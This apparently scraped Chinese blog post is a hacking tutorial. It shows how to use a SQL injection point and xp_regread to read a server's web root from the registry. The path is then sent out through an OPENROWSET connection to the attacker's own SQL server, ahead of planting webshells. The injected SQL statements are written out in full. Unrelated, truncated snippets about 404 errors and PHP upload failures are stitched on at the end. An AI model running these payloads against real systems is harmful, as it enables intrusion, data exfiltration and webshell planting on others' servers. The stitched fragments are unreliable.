得到sql注入點,首先想到的是backup webshell,扔在nb裡跑一圈,發現遮蔽了sql錯誤資訊,得不到物理路徑,那還寫個pp馬了.
聯想到乙個許可權不是很高的命令openrowset,進行跨庫伺服器查詢,就是把乙個sql命令傳送到遠端資料庫,然後看返回的結果,但是要啟動事件跟蹤!我們可以把**資訊寫入資料庫,然後%$^%$@#$@^%$~
首先在自己機器建立sql資料庫
然後在對方機器上建立個表 create table [dbo].[fenggou]([cha8][char](255))--
在對方執行 declare @result varchar(255) exec master.dbo.xp_regread 'hkey_local_machine','system/controlset001/services/w3svc/parameters/virtual roots', '/' ,@result output insert into fenggou (cha8) values('select a.* from openrowset(''sqloledb'',''自己的ip'';''sa'';''你的密碼'', ''select * from pubs.dbo.authors where au_fname=''''' + @result + ''''''')as a');--
這樣fenggou這個表裡就會有這樣一條記錄select a.* from openrowset('sqloledb','自己的ip';'sa';'你的密碼', 'select * from pubs.dbo.authors where au_fname=''d:/web,,1''')as a
不用說,''d:/web"就是從登錄檔裡讀出的物理路徑拉.然後執行declare @a1 char(255) set @a1=(select cha8 from fenggou) exec (@a1);--
等於執行了select a.* from openrowset('sqloledb','自己的ip';'sa';'你的密碼', 'select * from pubs.dbo.authors where au_fname=''d:/web,,1''')as a
ok,這時你在你機器上sql事件追蹤器上就會顯示select * from pubs.dbo.authors where au_fname='d:/web,,1'
哇 哈哈哈哈哈 物理路徑到手了 寫小馬傳大馬吧~
ps:如果出錯的話轉換為16進製制試試哈.以上是在偶滲透失敗,無奈的時候想的辦法,也許高人早就知道了吧,笑過~
Web無法訪問,提示404錯誤
uweb無法訪問,提示404錯誤 問題描述 在使用fix es2007快速開發平台.net版本安裝以後,web無法訪問,提示404錯誤。解決方法 web無法訪問提示404錯誤這是web應用中常見的錯誤之一,不是平台特有的,主要從以下五個方面解決 1 檢查iis安裝是否完整。2 屬性應用程式擴充套件列...
Web無法訪問,提示404錯誤
u web無法訪問,提示404錯誤 問題描述 在使用fix es2007快速開發平台 net 版本安裝以後,web無法訪問,提示 404錯誤。解決方法 web無法訪問提示404錯誤這是web應用中常見的錯誤之一,不是平台特有的,主要從以下五個方面解決 1 檢查 iis安裝是否完整。2 屬性應用程式擴...
PHP 上傳失敗提示錯誤編碼6 解決方案
有站長反饋上傳失敗,提示錯誤編碼為6。這個原因是典型的目錄許可權問題。對於某些主機商許可權沒有設定好就開始賣空間,表示很無語。當然還有部分初次搭建環境也容易碰到這個問題。看下php手冊裡給出的上傳錯誤列表 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19...